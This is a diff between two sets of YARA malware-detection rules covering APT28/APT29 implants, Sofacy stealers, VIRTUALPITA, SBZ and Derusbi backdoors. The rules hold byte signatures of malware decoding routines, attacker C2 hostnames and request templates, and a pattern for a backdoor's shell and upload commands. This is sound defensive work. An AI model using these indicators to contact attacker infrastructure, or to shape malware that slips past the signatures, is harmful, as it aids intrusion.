 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "59bfbef2-ff0e-59df-9d08-15001cec8ecf"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1245-L1258"
+		description = "File collectors / USB stealers - Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "03ced94f-de20-56c5-bf17-1ec7d8610684"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L99-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7e81e8bcc305b9b7166db85d81278c96edf232bf60040ef15a2376f204ca3046"
-		score = 85
+		hash = "e917166adf6e1135444f327d8fff6ec6c6a8606d65dda4e24c2f416d23b69d45"
+		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+		hash = "b1f2d461856bb6f2760785ee1af1a33c71f84986edf7322d3e9bd974ca95f92d"
+		logic_hash = "2086b4119bae17ec984665ea1e49d5f496a2cf6bf05ab507fe0cfb6e28039349"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 }
+		$s1 = "msdetltemp.dll" fullword ascii
+		$s2 = "msdeltemp.dll" fullword wide
+		$s3 = "Delete Temp Folder Service" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 2 of them
 }
-rule SIGNATURE_BASE_IMPLANT_6_V3 : FILE
+rule SIGNATURE_BASE_Sofacy_Collectorstealer_Gen3 : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "db090bc5-a90f-5b66-8fcb-29b423dddbf7"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1260-L1275"
+		description = "File collectors / USB stealers - Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d2ee1a22-6aae-51fc-9043-a7ba99769376"
+		date = "2015-12-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_dec15.yar#L118-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "833a6a3a4ff8ca43d4cf8053bfd1da49df96d9833dd3fe0f3ffbf6ce6c114681"
-		score = 85
+		hash = "92dcb0d8394d0df1064e68d90cd90a6ae5863e91f194cbaac85ec21c202f581f"
+		hash = "4e4606313c423b681e11110ca5ed3a2b2632ec6c556b7ab9642372ae709555f3"
+		logic_hash = "8e7f56013629d8b4d0c7600552590e8073deb16d5b6dced11444c2110b88f387"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A
-         04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A
-         1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? }
+		$s1 = "NvCpld.dll" fullword ascii
+		$s4 = "NvStart" fullword ascii
+		$s5 = "NvStop" fullword ascii
+		$a1 = "%.4d%.2d%.2d%.2d%.2d%.2d%.2d%.4d" fullword wide
+		$a2 = "IGFSRVC.dll" fullword wide
+		$a3 = "Common User Interface" fullword wide
+		$a4 = "igfsrvc Module" fullword wide
+		$b1 = " Operating System                        " fullword wide
+		$b2 = "Microsoft Corporation                                       " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $s* ) and ( all of ( $a* ) or all of ( $b* ) ) )
 }
-rule SIGNATURE_BASE_IMPLANT_6_V4 : FILE
+rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Obfuscation : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "27118ec8-3713-5670-88d2-3ac57c155c0d"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1277-L1291"
+		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
+		author = "netadr, modified by Florian Roth to avoid elf module import"
+		id = "15ee9a66-d823-508c-a14c-2c6ff45f47e5"
+		date = "2023-04-02"
+		modified = "2023-05-08"
+		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_sparc_sbz_apr23.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f5388668e148223bc94680ea84e83b0f2896ccf433523d171c8f46d7069f9a4b"
-		score = 85
+		logic_hash = "3d45dc8d8dbc62cee6b7ec4aa842eaa88bd23aea17e995eef4850fd91e7069a3"
+		score = 60
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? ?b
-         [6-10] c0 [0-1] c3}
+		$xor_block = { 9A 18 E0 47 9A 1B 40 01 9A 18 80 0D }
+		$a1 = "SUNW_"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		uint32be( 0 ) == 0x7f454c46 and $a1 and $xor_block
 }
-rule SIGNATURE_BASE_IMPLANT_6_V5 : FILE
+rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Uniquestrings
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "d035eaff-8c2a-53a2-b629-6448b2bcc9f6"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1293-L1327"
+		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
+		author = "netadr, modified by Florian Roth for performance reasons"
+		id = "d2f70d10-412e-5e83-ba4f-eac251012dc1"
+		date = "2023-04-02"
+		modified = "2023-05-08"
+		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_sparc_sbz_apr23.yar#L26-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b3ba650818ddbc58ce272ae4851ae3151a8cf1c9cc6f8e234a50b52c95d951fe"
-		score = 85
+		logic_hash = "bb95fc6bda0a0ed8ffc6db9734c725c487b0e70909d60119bf58d60987daaaeb"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B
-         EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD
-         57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F
-         83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00
-         00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83
-         86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D
-         71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D
-         46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32
-         D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5
-         8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38
-         41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20
-         8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F
-         82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB
-         0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00
-         00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2
-         06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34
-         8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44
-         3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2
-         BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5
-         8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B
-         44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46
-         3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 }
+		$s1 = "<%u>[%s] Event #%u: "
+		$s2 = "lprc:%08X" ascii fullword
+		$s3 = "diuXxobB"
+		$s4 = "CHM_FW"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		2 of ( $* )
 }
-rule SIGNATURE_BASE_IMPLANT_6_V6 : FILE
+rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Modulestruct : FILE
 {
 	meta:
-		description = "Sednit / EVILTOSS Implant by APT28"
-		author = "US CERT"
-		id = "89cc3764-d60c-5cbd-af32-a90d8b3400d7"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1329-L1343"
+		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
+		author = "netadr, modified by Florian Roth for FP reduction reasons"
+		id = "909746f1-44f5-597b-bdb2-2a1396d4b8c7"
+		date = "2023-04-02"
+		modified = "2023-05-08"
+		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_sparc_sbz_apr23.yar#L49-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77b5f95cd897c82c200ee6fa3970824adccfd7c56639d92361095f919781d731"
-		score = 85
+		logic_hash = "dc9608c769dcb14ba01559bfe2e8ed03eebf5695b867b53742f26e3fcce389ca"
+		score = 60
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50
-         FF 15 ?? ?? ?? ?? 33 C0 C3}
+		$be = { 02 02 00 00 01 C1 00 07 }
+		$le = { 02 02 00 00 07 00 C1 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
+		uint32be( 0 ) == 0x7f454c46 and ( $be or $le )
 }
-rule SIGNATURE_BASE_IMPLANT_7_V1 : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_1 : FILE
 {
 	meta:
-		description = "Implant 7 by APT29"
-		author = "US CERT"
-		id = "ce83c157-af03-55cb-a2be-0b6543fedb5b"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1368-L1381"
+		description = "Finds opcodes to set a port to bind on 2233, encompassing the setsockopt(), htons(), and bind() from 40973d to 409791 in fe34b7c071d96dac498b72a4a07cb246 (may produce some FPs - comment by Florian Roth)"
+		author = "Mandiant"
+		id = "bdfbe29a-f7db-50d9-a909-d4ca96cc0731"
+		date = "2023-11-25"
+		modified = "2025-12-19"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "996f81fe006e0ab15adab46275fdb60251e6c6616da33df600fadfc2684c24af"
-		score = 85
-		quality = 85
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "7641f964cc4a7671a9a3438aad1c653ef3fda3887313846cbe838b275a098190"
+		score = 60
+		quality = 45
 		tags = "FILE"
 
 	strings:
-		$STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
-		$STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
+		$x = { 8b ?? ?? 4? b8 04 00 00 00 [0-4] ba 02 00 00 00 be 01 00 00 00 [0-2] e8 ?? ?? ?? ?? 89 4? ?? 83 7? ?? 00 79 [0-50] ba 10 00 00 00 [0-10] e8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( $STR1 or $STR2 )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_IMPLANT_8_V1 : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_2 : FILE
 {
 	meta:
-		description = "HAMMERTOSS / HammerDuke Implant by APT29"
-		author = "US CERT"
-		id = "eeaa43c1-6004-5d64-bdc1-f84b3c68d741"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1383-L1411"
+		description = "Finds opcodes to decode and parse the recieved data in the socket buffer in fe34b7c071d96dac498b72a4a07cb246.  Opcodes from 401a36 to 401adc"
+		author = "Mandiant"
+		id = "6a59cc54-e1a0-594f-9efb-af63d5c05259"
+		date = "2022-10-01"
+		modified = "2025-12-19"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L15-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "437bda331405f9203747ffbfb107ec26e33973ebfc9f02e153697f7b8c22ad4f"
-		score = 65
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "56a3e1b13f0955a780f882e62003f721e409a1fdf61120dd295941605dbf21a4"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$DOTNET = "mscorlib" ascii
-		$REF_URL = "https://www.google.com/url?sa=" wide
-		$REF_var_1 = "&rct=" wide
-		$REF_var_2 = "&q=&esrc=" wide
-		$REF_var_3 = "&source=" wide
-		$REF_var_4 = "&cd=" wide
-		$REF_var_5 = "&ved=" wide
-		$REF_var_6 = "&url=" wide
-		$REF_var_7 = "&ei=" wide
-		$REF_var_8 = "&usg=" wide
-		$REF_var_9 = "&bvm=" wide
+		$x = { 85 c0 74 ?? c7 05 ?? ?? ?? ?? fb ff ff ff c7 8? ?? ?? ?? ?? 00 00 00 00 e9 ?? ?? ?? ?? 4? 8b 05 ?? ?? ?? ?? 4? 83 c0 01 4? 89 05 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 e9 ?? ?? ?? ?? 8b 4? ?? 4? 98 4? 8d 9? ?? ?? ?? ?? 4? 8d ?? e0 4? 8b 0? 4? 89 0? 4? 8b 4? ?? 4? 89 4? ?? 8b 4? ?? 4? 98 4? 8d b? ?? ?? ?? ?? b? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 eb ?? 8b 4? ?? 8b 4? ?? 01 c1 8b 4? ?? 03 4? ?? 4? 98 0f b6 9? ?? ?? ?? ?? 8b 4? ?? 4? 98 0f b6 8? ?? ?? ?? ?? 31 c2 4? 63 c1 88 9? ?? ?? ?? ?? 83 4? ?? 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( $DOTNET ) and ( $REF_URL ) and ( 3 of ( $REF_var* ) )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_IMPLANT_9_V1 : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_3 : FILE
 {
 	meta:
-		description = "Onion Duke Implant by APT29"
-		author = "US CERT"
-		id = "5460ff29-681b-5d11-a6ba-5f294e8577e6"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1431-L1448"
+		description = "Finds opcodes from 409dd8 to 409e46 in fe34b7c071d96dac498b72a4a07cb246 to set the HISTFILE environment variable to 'F' with a putenv() after loading each character individually."
+		author = "Mandiant"
+		id = "29ea2db0-4ab2-5e9c-8d42-7590ceabf99a"
+		date = "2022-10-01"
+		modified = "2025-12-19"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L27-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1166ef923d39952f4131a693c58b8bab5dcbe87f6a6b548a706d1fa10a82e22c"
-		score = 85
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "6f44d516b3cbe54542ae0991aad49274fc4728570e9498b319fc98840ceb7d7d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
-		$STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF
-         3B C6 72 E7 }
-		$STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88
-         4C 02 04 40 3B 06 72 E3 }
+		$x = { 4? 8b 4? ?? c6 00 48 4? 8b 4? ?? 4? 83 c0 05 c6 00 49 4? 8b 4? ?? 4? 83 c0 01 c6 00 49 4? 8b 4? ?? 4? 83 c0 06 c6 00 4c 4? 8b 4? ?? 4? 83 c0 02 c6 00 53 4? 8b 4? ?? 4? 83 c0 07 c6 00 45 4? 8b 4? ?? 4? 83 c0 03 c6 00 54 4? 8b 4? ?? 4? 83 c0 08 c6 00 3d 4? 8b 4? ?? 4? 83 c0 04 c6 00 46 4? 8b 4? ?? 4? 83 c0 09 c6 00 00 4? 8b 7? ?? e8 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_IMPLANT_10_V2 : FILE
+rule SIGNATURE_BASE_M_APT_VIRTUALPITA_4 : FILE
 {
 	meta:
-		description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
-		author = "US CERT"
-		id = "9c6d4eb9-98a5-5c6d-ba3a-0ce7524c5d2a"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1469-L1482"
+		description = "Finds opcodes from 401f1c to 401f4f in fe34b7c071d96dac498b72a4a07cb246 to decode text with multiple XORs"
+		author = "Mandiant"
+		id = "58d4db75-fcd5-50c2-93ba-a8a4718ac0f6"
+		date = "2022-10-01"
+		modified = "2025-12-19"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L39-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dc201d25b1d6cf8f88ae3bee18057902c4d64316aa9debc9248b0d8aa7f6d170"
-		score = 85
+		hash = "fe34b7c071d96dac498b72a4a07cb246"
+		logic_hash = "aaf2ff682c619d2a254fe069d477654a161658db6315239f1b956141b6a72c01"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$xor = { 34 ?? 66 33 C1 48 FF C1 }
-		$nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00}
+		$x = { 4? 8b 4? ?? 4? 83 c1 30 4? 8b 4? ?? 4? 8b 10 8b 4? ?? 4? 98 4? 8b 04 ?? ?? ?? ?? ?? 4? 31 c2 4? 8b 4? ?? 4? 83 c0 28 4? 8b 00 4? c1 e8 10 0f b6 c0 4? 98 4? 8b 04 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $xor and $nop
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_Unidentified_Malware_Two
+rule SIGNATURE_BASE_M_Hunting_Python_Backdoor_Commandparser_1 : FILE
 {
 	meta:
-		description = "Unidentified Implant by APT29"
-		author = "US CERT"
-		id = "848f2d1f-e352-51c1-ac5d-841bf309f2f2"
-		date = "2017-02-10"
-		modified = "2025-07-01"
-		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1521-L1543"
+		description = "Finds strings indicative of the vmsyslog.py python backdoor."
+		author = "Mandiant"
+		id = "15cbca01-24e6-5538-bcfd-c3222337aaf5"
+		date = "2022-10-01"
+		modified = "2025-12-19"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L52-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd9adfb9e27e4d6b27498cc029e15132343f036cca60210528720a533fe20d9a"
-		score = 85
+		hash = "61ab3f6401d60ec36cd3ac980a8deb75"
+		logic_hash = "4c6e65d73543b2ae8e1c0e9a919501a3624fb06d4355a296ae8abb6762d37a1f"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$my_string_one = "/zapoy/gate.php"
-		$my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55
-         FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A
-         55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
-		$my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
-		$my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8
-         8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
-		$my_string_five = "fuckyou1"
-		$my_string_six = "xtool.exe"
+		$key1 = "self.conn.readInt8()" ascii
+		$key2 = "upload" ascii
+		$key3 = "download" ascii
+		$key4 = "shell" ascii
+		$key5 = "execute" ascii
+		$re1 = /def\srun.{0,20}command\s?=\s?self\.conn\.readInt8\(\).{,75}upload.{,75}download.{,75}shell.{,75}execute/s
 
 	condition:
-		($my_string_one and $my_string_two ) or ( $my_string_three or $my_string_four ) or ( $my_string_five and $my_string_six )
+		filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Unit78020_Sep15 : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_1 : FILE
 {
 	meta:
-		description = "Detects malware used by Unit78020"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d26d401f-3806-5a0b-bdb3-87d5d8af209c"
-		date = "2015-09-24"
-		modified = "2023-01-31"
-		old_rule_name = "Unit78020_Malware_Gen1"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L8-L58"
+		description = "Detects Derusbi Backdoor ELF"
+		author = "Fidelis Cybersecurity"
+		id = "c825c5d6-1c2f-5ee7-871e-4be3f41d73f7"
+		date = "2016-02-29"
+		modified = "2023-05-04"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L1-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85244d4e2b9e03fa4ab8268ffbedffb839bca598b1e863d3d0b3914294d3ddf0"
-		score = 80
+		logic_hash = "61ef65a1500d3def3376a82bc376db451d202d18b03855ee279b6c01757deb2a"
+		score = 75
 		quality = 83
 		tags = "FILE"
-		hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72"
-		hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
-		hash3 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
-		hash4 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
-		hash5 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
-		hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790"
 
 	strings:
-		$x1 = "greensky27.vicp.net" fullword wide
-		$x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
-		$x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
-		$x4 = "serch.vicp.net" fullword wide
-		$x5 = "greensky27.vicp.net" fullword wide
